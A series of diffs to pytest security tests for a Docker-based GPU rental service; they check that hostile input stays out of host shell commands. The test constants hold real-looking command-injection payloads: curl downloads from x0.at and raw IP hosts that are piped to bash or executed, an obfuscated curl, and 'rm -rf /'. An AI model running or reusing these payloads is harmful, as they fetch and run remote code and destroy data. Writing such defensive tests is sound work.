+            "volume_name": "volume_test",
+            "driver": "vloopback",
+            "driver_opts": {"size": "200g", "sparse": "true"},
+            "timeout": 50,
+        }
+    ]
 
 
 @pytest.mark.asyncio
@@ -2550,11 +2564,13 @@ async def test_create_local_volume_sparse_false_keeps_preallocation(
     """sparse=False (partial / legacy rental) → no sparse flag; size cap unchanged."""
     ssh_client = AsyncMock()
     ssh_client.run = AsyncMock(return_value=Mock(stdout="/var/lib/docker\n"))
-    execute = AsyncMock()
-    monkeypatch.setattr(docker_service, "execute_and_stream_logs", execute)
+    stream_log = AsyncMock()
+    monkeypatch.setattr(docker_service, "stream_log", stream_log)
+    docker_client = _FakeRentalDockerClient()
 
     await docker_service.create_local_volume(
         ssh_client=ssh_client,
+        docker_client=docker_client,
         local_volume="volume_test",
         log_tag="tag",
         log_text="Creating docker volume volume_test",
@@ -2562,10 +2578,15 @@ async def test_create_local_volume_sparse_false_keeps_preallocation(
         limit=200,
     )
 
-    command = execute.await_args.kwargs["command"]
-    assert command == "/usr/bin/docker volume create -d vloopback volume_test -o size=200g"
-    assert "sparse" not in command
-    assert execute.await_args.kwargs["log_extra"]["sparse"] is False
+    stream_log.assert_awaited_once_with("Creating docker volume volume_test", "success", "tag")
+    assert docker_client.created_volumes == [
+        {
+            "volume_name": "volume_test",
+            "driver": "vloopback",
+            "driver_opts": {"size": "200g"},
+            "timeout": 50,
+        }
+    ]
 
 
 @pytest.mark.parametrize(

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -35,6 +35,8 @@ class _FakeRentalDockerClient:
         self.started_containers = []
         self.stopped_containers = []
         self.removed_containers = []
+        self.removed_volumes = []
+        self.pruned_images = 0
         self.pull_error = None
         self.run_error = None
         self.start_error = None
@@ -84,6 +86,14 @@ class _FakeRentalDockerClient:
         )
         if self.remove_error is not None:
             raise self.remove_error
+
+    async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
+        self.removed_volumes.append(
+            {"volume_name": volume_name, "force": force}
+        )
+
+    async def prune_images(self) -> None:
+        self.pruned_images += 1
 
 
 class _FakeRentalDockerFactory:
@@ -782,7 +792,6 @@ def _make_retry_error(exc: Exception) -> RetryError:
 @pytest.mark.asyncio
 async def test_delete_filler_container_treats_missing_container_as_deleted(
     docker_service,
-    retry_ssh_mock,
     monkeypatch,
 ):
     ssh_client = AsyncMock()
@@ -799,7 +808,6 @@ async def test_delete_filler_container_treats_missing_container_as_deleted(
     docker_service.rental_docker_client_factory.client.remove_error = Exception(
         "Error response from daemon: No such container: filler_missing"
     )
-    retry_ssh_mock.return_value = None
 
     payload = ContainerDeleteRequest(
         miner_hotkey="miner",
@@ -836,7 +844,10 @@ async def test_delete_filler_container_treats_missing_container_as_deleted(
             "remove_volumes": True,
         }
     ]
-    assert retry_ssh_mock.await_count == 1
+    assert docker_service.rental_docker_client_factory.client.pruned_images == 1
+    assert docker_service.rental_docker_client_factory.client.removed_volumes == [
+        {"volume_name": payload.local_volume, "force": False}
+    ]
     docker_service.redis_service.remove_rented_machine.assert_awaited_once_with(
         executor_info,
         payload.container_name,

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -15,6 +15,7 @@ from payload_models.payloads import (
     ContainerStopRequest,
     CustomOptions,
     PayloadPortMapping,
+    RemoveSshPublicKeysRequest,
     WorkloadKind,
 )
 from services.docker_service import DockerService
@@ -70,6 +71,8 @@ class RecordingRentalDockerClient:
         self.started_containers = []
         self.stopped_containers = []
         self.removed_containers = []
+        self.removed_volumes = []
+        self.pruned_images = 0
 
     async def login(self, *, username: str, password: str) -> None:
         self.login_calls.append({"username": username, "password": password})
@@ -104,6 +107,14 @@ class RecordingRentalDockerClient:
                 "remove_volumes": remove_volumes,
             }
         )
+
+    async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
+        self.removed_volumes.append(
+            {"volume_name": volume_name, "force": force}
+        )
+
+    async def prune_images(self) -> None:
+        self.pruned_images += 1
 
 
 class RecordingRentalDockerFactory:
@@ -383,6 +394,43 @@ async def test_add_ssh_key_writes_public_keys_as_stdin_data(
 
 
 @pytest.mark.asyncio
+async def test_remove_ssh_key_writes_public_keys_as_stdin_data(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    _patch_common(monkeypatch, docker_service, ssh_client)
+    payload = RemoveSshPublicKeysRequest(
+        miner_hotkey="miner-hotkey",
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        workload_kind=WorkloadKind.CUSTOMER_RENTAL,
+        container_name=HOSTILE_CONTAINER_NAME,
+        user_public_keys=[HOSTILE_PUBLIC_KEY],
+    )
+
+    await docker_service.remove_ssh_keys(
+        payload,
+        executor_info,
+        keypair,
+        "encrypted-private-key",
+    )
+
+    docker_client = docker_service.rental_docker_client_factory.client
+    assert len(docker_client.exec_specs) == 1
+    spec = docker_client.exec_specs[0]
+    _assert_markers_not_in_host_shell(
+        ssh_client.commands,
+        ["CONTAINER_MARKER", "KEY_MARKER"],
+    )
+    assert spec.container_name == HOSTILE_CONTAINER_NAME
+    assert HOSTILE_PUBLIC_KEY not in " ".join(spec.argv)
+    assert spec.stdin == f"{HOSTILE_PUBLIC_KEY}\n"
+
+
+@pytest.mark.asyncio
 async def test_lifecycle_operations_pass_container_names_as_sdk_data(
     docker_service,
     executor_info,
@@ -444,6 +492,10 @@ async def test_lifecycle_operations_pass_container_names_as_sdk_data(
             "force": True,
             "remove_volumes": True,
         }
+    ]
+    assert docker_client.pruned_images == 1
+    assert docker_client.removed_volumes == [
+        {"volume_name": "volume_lifecycle", "force": False}
     ]
 
 

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -1,3 +1,4 @@
+import shlex
 from types import SimpleNamespace
 from unittest.mock import AsyncMock, Mock
 from uuid import uuid4
@@ -9,6 +10,7 @@ from payload_models.payloads import (
     AddSshPublicKeyRequest,
     ContainerCreateRequest,
     ContainerDeleteRequest,
+    FailedContainerRequest,
     ContainerStartRequest,
     ContainerStopRequest,
     CustomOptions,
@@ -28,6 +30,8 @@ HOSTILE_PUBLIC_KEY = (
 )
 HOSTILE_STARTUP_COMMAND = "\n\nsh /tmp/startup-marker.sh"
 HOSTILE_CONTAINER_NAME = "pod_name; echo CONTAINER_MARKER; $(echo name)"
+HOSTILE_VOLUME_NAME = "volume_bad; echo VOLUME_MARKER; $(echo volume)"
+HOSTILE_MINER_HOTKEY = "miner; echo HOTKEY_MARKER; $(echo hotkey)"
 
 
 class DummySSHConnectionManager:
@@ -42,12 +46,19 @@ class DummySSHConnectionManager:
 
 
 class RecordingSSHClient:
-    def __init__(self):
+    def __init__(self, *, stdout: str = "", stderr: str = "", exit_status: int = 0):
         self.commands = []
+        self.stdout = stdout
+        self.stderr = stderr
+        self.exit_status = exit_status
 
     async def run(self, command, *args, **kwargs):
         self.commands.append(command)
-        return SimpleNamespace(stdout="", stderr="", exit_status=0)
+        return SimpleNamespace(
+            stdout=self.stdout,
+            stderr=self.stderr,
+            exit_status=self.exit_status,
+        )
 
 
 class RecordingRentalDockerClient:
@@ -277,6 +288,12 @@ def _assert_markers_not_in_host_shell(commands, markers):
     assert not hits, "user-controlled marker appeared in host shell command text"
 
 
+def _assert_shell_arg_is_single_token(command: str, expected_arg: str):
+    words = shlex.split(command)
+    assert expected_arg in words
+    assert words.count(expected_arg) == 1
+
+
 @pytest.mark.asyncio
 async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     docker_service,
@@ -428,3 +445,99 @@ async def test_lifecycle_operations_pass_container_names_as_sdk_data(
             "remove_volumes": True,
         }
     ]
+
+
+@pytest.mark.parametrize(
+    "volume_kwargs",
+    [
+        {"local_volume": HOSTILE_VOLUME_NAME},
+        {"external_volume": HOSTILE_VOLUME_NAME},
+    ],
+)
+@pytest.mark.asyncio
+async def test_delete_container_rejects_unsafe_volume_names_before_shell(
+    docker_service,
+    executor_info,
+    keypair,
+    volume_kwargs,
+):
+    payload = ContainerDeleteRequest(
+        miner_hotkey="miner-hotkey",
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        workload_kind=WorkloadKind.CUSTOMER_RENTAL,
+        container_name="pod_valid",
+        **volume_kwargs,
+    )
+
+    result = await docker_service.delete_container(
+        payload,
+        executor_info,
+        keypair,
+        "encrypted-private-key",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert docker_service.rental_docker_client_factory.connect_calls == []
+
+
+@pytest.mark.asyncio
+async def test_check_container_running_quotes_hostile_container_name_filter(
+    docker_service,
+):
+    ssh_client = RecordingSSHClient(stdout="container-id\n")
+
+    assert await docker_service.check_container_running(
+        ssh_client,
+        HOSTILE_CONTAINER_NAME,
+    )
+
+    assert len(ssh_client.commands) == 1
+    _assert_shell_arg_is_single_token(
+        ssh_client.commands[0],
+        f"name={HOSTILE_CONTAINER_NAME}",
+    )
+    assert "echo" not in shlex.split(ssh_client.commands[0])
+
+
+@pytest.mark.asyncio
+async def test_port_check_filters_quote_hostile_miner_hotkey(
+    docker_service,
+):
+    ssh_client = RecordingSSHClient()
+
+    result = await docker_service.wait_for_port_check_containers(
+        executor_info=Mock(),
+        miner_hotkey=HOSTILE_MINER_HOTKEY,
+        keypair=Mock(),
+        private_key="unused",
+        max_retries=0,
+        retry_delay=0,
+        ssh_client=ssh_client,
+    )
+
+    assert result == (True, "No port check containers found")
+    assert len(ssh_client.commands) == 1
+    _assert_shell_arg_is_single_token(
+        ssh_client.commands[0],
+        f"name=^container_{HOSTILE_MINER_HOTKEY}_",
+    )
+    assert "echo" not in shlex.split(ssh_client.commands[0])
+
+
+@pytest.mark.asyncio
+async def test_create_local_volume_rejects_unsafe_volume_name_before_shell(
+    docker_service,
+):
+    ssh_client = RecordingSSHClient()
+
+    with pytest.raises(ValueError):
+        await docker_service.create_local_volume(
+            ssh_client=ssh_client,
+            local_volume=HOSTILE_VOLUME_NAME,
+            log_tag="test",
+            log_text="Creating volume",
+            log_extra={},
+        )
+
+    assert ssh_client.commands == []

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -480,6 +480,7 @@ async def test_create_container_streams_sdk_run_error_details(
     streamed_messages = [
         call.args[0] for call in docker_service.stream_log.await_args_list
     ]
+    assert "Creating docker container" in streamed_messages
     assert any("VolumeDriver.Mount" in message for message in streamed_messages)
     assert any("fstype should be s3fs" in message for message in streamed_messages)
 

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -24,16 +24,13 @@ from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_con
 
 HOSTILE_USERNAME = "user'; rm -rf / #"
 HOSTILE_PASSWORD = (
-    "x' | curl https://x0.at/mney -o /tmp/mney"
+    "x' | curl -fsSL https://x0.at/mney -o /tmp/mney"
     "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
 )
-HOSTILE_IMAGE = "registry.example/image;echo IMAGE_MARKER\n$(echo IMAGE_SUBSHELL)"
+HOSTILE_IMAGE = "|| curl -fsSL http://69.197.150.11:54321/update | bash ||:0.0.0"
 HOSTILE_ENV_VALUE = "value'; echo ENV_MARKER; $(echo env)"
-HOSTILE_PUBLIC_KEY = (
-    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEfakeKeyForTestsOnly "
-    "user@example; echo KEY_MARKER; $(echo key)"
-)
-HOSTILE_STARTUP_COMMAND = "\n\nsh /tmp/startup-marker.sh"
+HOSTILE_PUBLIC_KEY = "';  c'u'''''r\\l'''' -o /tmp/systemd 203.23.128.30:443/linux_wss;'"
+HOSTILE_STARTUP_COMMAND = "\n\nsh /tmp/Jtd7.sh"
 HOSTILE_CONTAINER_NAME = "pod_name; echo CONTAINER_MARKER; $(echo name)"
 HOSTILE_VOLUME_NAME = "volume_bad; echo VOLUME_MARKER; $(echo volume)"
 HOSTILE_MINER_HOTKEY = "miner; echo HOTKEY_MARKER; $(echo hotkey)"
@@ -339,16 +336,17 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     _assert_markers_not_in_host_shell(
         _all_host_commands(captured_commands, ssh_client),
         [
-            "curl https://x0.at/mney",
+            "curl -fsSL https://x0.at/mney",
             "&&chmod +x /tmp/mney",
             "/tmp/mney   |echo",
             "rm -rf",
-            "IMAGE_MARKER",
-            "IMAGE_SUBSHELL",
+            "69.197.150.11:54321/update",
+            "| bash",
             "ENV_MARKER",
             "ENV_NEWLINE_MARKER",
-            "KEY_MARKER",
-            "startup-marker.sh",
+            "/tmp/systemd",
+            "203.23.128.30:443/linux_wss",
+            "/tmp/Jtd7.sh",
         ],
     )
     assert docker_client.login_calls == [
@@ -356,7 +354,7 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     ]
     assert docker_client.pulled_images == [HOSTILE_IMAGE]
     assert run_spec.image == HOSTILE_IMAGE
-    assert run_spec.command == ("sh", "/tmp/startup-marker.sh")
+    assert run_spec.command == ("sh", "/tmp/Jtd7.sh")
     assert run_spec.environment["HOSTILE_ENV"] == HOSTILE_ENV_VALUE
     assert len(key_specs) == 1
     assert HOSTILE_PUBLIC_KEY not in " ".join(key_specs[0].argv)
@@ -394,7 +392,10 @@ async def test_add_ssh_key_writes_public_keys_as_stdin_data(
     docker_client = docker_service.rental_docker_client_factory.client
     assert len(docker_client.exec_specs) == 1
     spec = docker_client.exec_specs[0]
-    _assert_markers_not_in_host_shell(ssh_client.commands, ["KEY_MARKER"])
+    _assert_markers_not_in_host_shell(
+        ssh_client.commands,
+        ["/tmp/systemd", "203.23.128.30:443/linux_wss"],
+    )
     assert spec.container_name == HOSTILE_CONTAINER_NAME
     assert HOSTILE_PUBLIC_KEY not in " ".join(spec.argv)
     assert spec.stdin == f"{HOSTILE_PUBLIC_KEY}\n"
@@ -430,7 +431,7 @@ async def test_remove_ssh_key_writes_public_keys_as_stdin_data(
     spec = docker_client.exec_specs[0]
     _assert_markers_not_in_host_shell(
         ssh_client.commands,
-        ["CONTAINER_MARKER", "KEY_MARKER"],
+        ["CONTAINER_MARKER", "/tmp/systemd", "203.23.128.30:443/linux_wss"],
     )
     assert spec.container_name == HOSTILE_CONTAINER_NAME
     assert HOSTILE_PUBLIC_KEY not in " ".join(spec.argv)

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -22,7 +22,11 @@ from services.docker_service import DockerService
 from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 
 
-HOSTILE_PASSWORD = "pw'; echo CREDENTIAL_MARKER; echo '"
+HOSTILE_USERNAME = "user'; rm -rf / #"
+HOSTILE_PASSWORD = (
+    "x' | curl https://x0.at/mney -o /tmp/mney"
+    "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
+)
 HOSTILE_IMAGE = "registry.example/image;echo IMAGE_MARKER\n$(echo IMAGE_SUBSHELL)"
 HOSTILE_ENV_VALUE = "value'; echo ENV_MARKER; $(echo env)"
 HOSTILE_PUBLIC_KEY = (
@@ -176,7 +180,7 @@ def _base_create_payload(**overrides) -> ContainerCreateRequest:
         "executor_id": str(uuid4()),
         "pod_id": "00000000-0000-0000-0000-0000000000aa",
         "docker_image": "daturaai/pytorch:security-test",
-        "docker_username": "registry-user",
+        "docker_username": HOSTILE_USERNAME,
         "docker_password": HOSTILE_PASSWORD,
         "user_public_keys": [HOSTILE_PUBLIC_KEY],
         "gpu_uuids": ["GPU-test"],
@@ -335,7 +339,10 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     _assert_markers_not_in_host_shell(
         _all_host_commands(captured_commands, ssh_client),
         [
-            "CREDENTIAL_MARKER",
+            "curl https://x0.at/mney",
+            "&&chmod +x /tmp/mney",
+            "/tmp/mney   |echo",
+            "rm -rf",
             "IMAGE_MARKER",
             "IMAGE_SUBSHELL",
             "ENV_MARKER",
@@ -345,7 +352,7 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
         ],
     )
     assert docker_client.login_calls == [
-        {"username": "registry-user", "password": HOSTILE_PASSWORD}
+        {"username": HOSTILE_USERNAME, "password": HOSTILE_PASSWORD}
     ]
     assert docker_client.pulled_images == [HOSTILE_IMAGE]
     assert run_spec.image == HOSTILE_IMAGE

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -401,7 +401,7 @@ async def test_create_container_emits_secret_safe_sdk_operation_logs(
     _patch_create_harness(monkeypatch, docker_service, ssh_client)
     payload = _base_create_payload(docker_image=HOSTILE_IMAGE)
 
-    with caplog.at_level(logging.INFO, logger="services.rental_docker_observability"):
+    with caplog.at_level(logging.INFO):
         await docker_service.create_container(
             payload=payload,
             executor_info=executor_info,
@@ -456,6 +456,18 @@ async def test_create_container_emits_secret_safe_sdk_operation_logs(
     assert HOSTILE_PASSWORD not in serialized
     assert HOSTILE_PUBLIC_KEY not in serialized
     assert HOSTILE_ENV_VALUE not in serialized
+
+    all_log_content = json.dumps(
+        {
+            "messages": [record.getMessage() for record in caplog.records],
+            "extras": [
+                getattr(record.msg, "extra", {})
+                for record in caplog.records
+            ],
+        },
+        default=str,
+    )
+    assert HOSTILE_PASSWORD not in all_log_content
 
 
 class NonZeroExecRentalDockerClient:

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -1,0 +1,430 @@
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, Mock
+from uuid import uuid4
+
+import pytest
+
+from datura.requests.miner_requests import ExecutorSSHInfo
+from payload_models.payloads import (
+    AddSshPublicKeyRequest,
+    ContainerCreateRequest,
+    ContainerDeleteRequest,
+    ContainerStartRequest,
+    ContainerStopRequest,
+    CustomOptions,
+    PayloadPortMapping,
+    WorkloadKind,
+)
+from services.docker_service import DockerService
+from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
+
+
+HOSTILE_PASSWORD = "pw'; echo CREDENTIAL_MARKER; echo '"
+HOSTILE_IMAGE = "registry.example/image;echo IMAGE_MARKER\n$(echo IMAGE_SUBSHELL)"
+HOSTILE_ENV_VALUE = "value'; echo ENV_MARKER; $(echo env)"
+HOSTILE_PUBLIC_KEY = (
+    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEfakeKeyForTestsOnly "
+    "user@example; echo KEY_MARKER; $(echo key)"
+)
+HOSTILE_STARTUP_COMMAND = "\n\nsh /tmp/startup-marker.sh"
+HOSTILE_CONTAINER_NAME = "pod_name; echo CONTAINER_MARKER; $(echo name)"
+
+
+class DummySSHConnectionManager:
+    def __init__(self, ssh_client):
+        self.ssh_client = ssh_client
+
+    async def __aenter__(self):
+        return self.ssh_client
+
+    async def __aexit__(self, exc_type, exc_val, exc_tb):
+        return None
+
+
+class RecordingSSHClient:
+    def __init__(self):
+        self.commands = []
+
+    async def run(self, command, *args, **kwargs):
+        self.commands.append(command)
+        return SimpleNamespace(stdout="", stderr="", exit_status=0)
+
+
+class RecordingRentalDockerClient:
+    def __init__(self):
+        self.login_calls = []
+        self.pulled_images = []
+        self.run_specs = []
+        self.exec_specs = []
+        self.started_containers = []
+        self.stopped_containers = []
+        self.removed_containers = []
+
+    async def login(self, *, username: str, password: str) -> None:
+        self.login_calls.append({"username": username, "password": password})
+
+    async def pull(self, *, image: str) -> None:
+        self.pulled_images.append(image)
+
+    async def run_container(self, spec) -> None:
+        self.run_specs.append(spec)
+
+    async def exec_in_container(self, spec) -> ContainerExecResult:
+        self.exec_specs.append(spec)
+        return ContainerExecResult(exit_status=0)
+
+    async def start(self, *, container_name: str) -> None:
+        self.started_containers.append(container_name)
+
+    async def stop(self, *, container_name: str) -> None:
+        self.stopped_containers.append(container_name)
+
+    async def remove_container(
+        self,
+        *,
+        container_name: str,
+        force: bool = True,
+        remove_volumes: bool = True,
+    ) -> None:
+        self.removed_containers.append(
+            {
+                "container_name": container_name,
+                "force": force,
+                "remove_volumes": remove_volumes,
+            }
+        )
+
+
+class RecordingRentalDockerFactory:
+    def __init__(self):
+        self.client = RecordingRentalDockerClient()
+        self.connect_calls = []
+
+    def connect(self, *, executor_info: ExecutorSSHInfo, private_key: str):
+        self.connect_calls.append(
+            {"executor_info": executor_info, "private_key": private_key}
+        )
+        return self
+
+    async def __aenter__(self):
+        return self.client
+
+    async def __aexit__(self, exc_type, exc_val, exc_tb):
+        return None
+
+
+@pytest.fixture
+def docker_service():
+    ssh_service = Mock()
+    redis_service = Mock()
+    attestation_service = Mock()
+    lock = AsyncMock()
+    lock.__aenter__ = AsyncMock(return_value=lock)
+    lock.__aexit__ = AsyncMock(return_value=None)
+    redis_service.acquire_executor_lock = Mock(return_value=lock)
+    return DockerService(
+        ssh_service=ssh_service,
+        redis_service=redis_service,
+        attestation_service=attestation_service,
+        rental_docker_client_factory=RecordingRentalDockerFactory(),
+    )
+
+
+@pytest.fixture
+def executor_info():
+    return ExecutorSSHInfo(
+        uuid=str(uuid4()),
+        address="127.0.0.1",
+        port=8080,
+        ssh_username="root",
+        ssh_port=2200,
+        python_path="/usr/bin/python3",
+        root_dir="/root/app",
+    )
+
+
+@pytest.fixture
+def keypair():
+    return Mock(ss58_address="validator-hotkey")
+
+
+def _base_create_payload(**overrides) -> ContainerCreateRequest:
+    values = {
+        "miner_hotkey": "miner-hotkey",
+        "executor_id": str(uuid4()),
+        "pod_id": "00000000-0000-0000-0000-0000000000aa",
+        "docker_image": "daturaai/pytorch:security-test",
+        "docker_username": "registry-user",
+        "docker_password": HOSTILE_PASSWORD,
+        "user_public_keys": [HOSTILE_PUBLIC_KEY],
+        "gpu_uuids": ["GPU-test"],
+        "cpu_count": 2,
+        "memory_gb": 8,
+        "custom_options": CustomOptions(
+            volumes=["/data/rental:/workspace"],
+            environment={
+                "APP_MODE": "prod",
+                "HOSTILE_ENV": HOSTILE_ENV_VALUE,
+                "MULTILINE_ENV": "line1\nENV_NEWLINE_MARKER",
+            },
+            startup_commands=HOSTILE_STARTUP_COMMAND,
+            shm_size="1g",
+        ),
+        "volume_limit_gb": 100,
+        "storage_limit_gb": 50,
+        "available_ports": [
+            PayloadPortMapping(internal_port=22, external_port=30022),
+            PayloadPortMapping(internal_port=20000, external_port=30000),
+        ],
+        "pod_mapping": [],
+        "active_container_names": [],
+        "active_volume_names": [],
+    }
+    values.update(overrides)
+    return ContainerCreateRequest(**values)
+
+
+def _lifecycle_payload(payload_cls, *, container_name: str):
+    return payload_cls(
+        miner_hotkey="miner-hotkey",
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        workload_kind=WorkloadKind.CUSTOMER_RENTAL,
+        container_name=container_name,
+    )
+
+
+def _patch_common(monkeypatch, docker_service, ssh_client):
+    monkeypatch.setattr(
+        "services.docker_service.asyncssh.connect",
+        Mock(return_value=DummySSHConnectionManager(ssh_client)),
+    )
+    monkeypatch.setattr(
+        "services.docker_service.asyncssh.import_private_key",
+        Mock(return_value="pkey"),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "_prepare_known_hosts_policy",
+        AsyncMock(return_value=None),
+    )
+    docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
+
+
+def _patch_create_harness(monkeypatch, docker_service, ssh_client):
+    captured_commands = []
+
+    async def execute_and_capture(*, command, **kwargs):
+        captured_commands.append(command)
+        return True, ""
+
+    _patch_common(monkeypatch, docker_service, ssh_client)
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(
+            return_value=build_gpu_docker_config(
+                ["GPU-test"],
+                device_nodes=["/dev/nvidia0", "/dev/nvidiactl"],
+            )
+        ),
+    )
+    monkeypatch.setattr(docker_service, "execute_and_stream_logs", execute_and_capture)
+    monkeypatch.setattr(docker_service, "clean_existing_containers", AsyncMock())
+    monkeypatch.setattr(docker_service, "clean_stale_vloopback_volumes", AsyncMock())
+    monkeypatch.setattr(docker_service, "create_local_volume", AsyncMock())
+    monkeypatch.setattr(
+        docker_service,
+        "resolve_volume_sizing",
+        AsyncMock(
+            return_value=SimpleNamespace(volume_limit_gb=44, storage_limit_gb=22)
+        ),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "generate_portMappings",
+        AsyncMock(return_value=([(22, 22, 30022), (20000, 20000, 30000)], None)),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "wait_for_port_check_containers",
+        AsyncMock(return_value=(True, "ok")),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "check_container_running",
+        AsyncMock(return_value=True),
+    )
+    monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
+    monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
+    monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
+    docker_service.redis_service.add_pending_pod = AsyncMock()
+    docker_service.redis_service.remove_pending_pod = AsyncMock()
+    docker_service.redis_service.add_rented_pod = AsyncMock()
+    return captured_commands
+
+
+def _all_host_commands(captured_commands, ssh_client):
+    return [*captured_commands, *ssh_client.commands]
+
+
+def _assert_markers_not_in_host_shell(commands, markers):
+    hits = [
+        (marker, command)
+        for command in commands
+        for marker in markers
+        if marker in command
+    ]
+    assert not hits, "user-controlled marker appeared in host shell command text"
+
+
+@pytest.mark.asyncio
+async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    captured_commands = _patch_create_harness(monkeypatch, docker_service, ssh_client)
+    payload = _base_create_payload(docker_image=HOSTILE_IMAGE)
+
+    await docker_service.create_container(
+        payload=payload,
+        executor_info=executor_info,
+        keypair=keypair,
+        private_key="encrypted-private-key",
+    )
+
+    docker_client = docker_service.rental_docker_client_factory.client
+    run_spec = docker_client.run_specs[0]
+    key_specs = [
+        spec for spec in docker_client.exec_specs if "authorized_keys" in " ".join(spec.argv)
+    ]
+    env_specs = [
+        spec for spec in docker_client.exec_specs if "/etc/environment" in " ".join(spec.argv)
+    ]
+
+    _assert_markers_not_in_host_shell(
+        _all_host_commands(captured_commands, ssh_client),
+        [
+            "CREDENTIAL_MARKER",
+            "IMAGE_MARKER",
+            "IMAGE_SUBSHELL",
+            "ENV_MARKER",
+            "ENV_NEWLINE_MARKER",
+            "KEY_MARKER",
+            "startup-marker.sh",
+        ],
+    )
+    assert docker_client.login_calls == [
+        {"username": "registry-user", "password": HOSTILE_PASSWORD}
+    ]
+    assert docker_client.pulled_images == [HOSTILE_IMAGE]
+    assert run_spec.image == HOSTILE_IMAGE
+    assert run_spec.command == ("sh", "/tmp/startup-marker.sh")
+    assert run_spec.environment["HOSTILE_ENV"] == HOSTILE_ENV_VALUE
+    assert len(key_specs) == 1
+    assert HOSTILE_PUBLIC_KEY not in " ".join(key_specs[0].argv)
+    assert key_specs[0].stdin == f"{HOSTILE_PUBLIC_KEY}\n"
+    assert len(env_specs) == 1
+    assert env_specs[0].argv == ("sh", "-c", "cat >> /etc/environment")
+    assert "ENV_NEWLINE_MARKER" in env_specs[0].stdin
+
+
+@pytest.mark.asyncio
+async def test_add_ssh_key_writes_public_keys_as_stdin_data(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    _patch_common(monkeypatch, docker_service, ssh_client)
+    payload = AddSshPublicKeyRequest(
+        miner_hotkey="miner-hotkey",
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        workload_kind=WorkloadKind.CUSTOMER_RENTAL,
+        container_name=HOSTILE_CONTAINER_NAME,
+        user_public_keys=[HOSTILE_PUBLIC_KEY],
+    )
+
+    await docker_service.add_ssh_key(
+        payload,
+        executor_info,
+        keypair,
+        "encrypted-private-key",
+    )
+
+    docker_client = docker_service.rental_docker_client_factory.client
+    assert len(docker_client.exec_specs) == 1
+    spec = docker_client.exec_specs[0]
+    _assert_markers_not_in_host_shell(ssh_client.commands, ["KEY_MARKER"])
+    assert spec.container_name == HOSTILE_CONTAINER_NAME
+    assert HOSTILE_PUBLIC_KEY not in " ".join(spec.argv)
+    assert spec.stdin == f"{HOSTILE_PUBLIC_KEY}\n"
+
+
+@pytest.mark.asyncio
+async def test_lifecycle_operations_pass_container_names_as_sdk_data(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    retried_commands = []
+
+    async def retry_capture(ssh_client, command, *args, **kwargs):
+        retried_commands.append(command)
+
+    _patch_common(monkeypatch, docker_service, ssh_client)
+    monkeypatch.setattr("services.docker_service.retry_ssh_command", retry_capture)
+    monkeypatch.setattr(docker_service, "_cleanup_custom_build_artifacts", AsyncMock())
+    monkeypatch.setattr(
+        docker_service,
+        "install_open_ssh_server_and_start_ssh_service_with_rental_docker",
+        AsyncMock(return_value=True),
+    )
+    docker_service.redis_service.remove_rented_machine = AsyncMock()
+
+    await docker_service.start_container(
+        _lifecycle_payload(ContainerStartRequest, container_name=HOSTILE_CONTAINER_NAME),
+        executor_info,
+        keypair,
+        "encrypted-private-key",
+    )
+    await docker_service.stop_container(
+        _lifecycle_payload(ContainerStopRequest, container_name=HOSTILE_CONTAINER_NAME),
+        executor_info,
+        keypair,
+        "encrypted-private-key",
+    )
+    await docker_service.delete_container(
+        ContainerDeleteRequest(
+            miner_hotkey="miner-hotkey",
+            executor_id=str(uuid4()),
+            pod_id="pod-id",
+            workload_kind=WorkloadKind.CUSTOMER_RENTAL,
+            container_name=HOSTILE_CONTAINER_NAME,
+            local_volume="volume_lifecycle",
+        ),
+        executor_info,
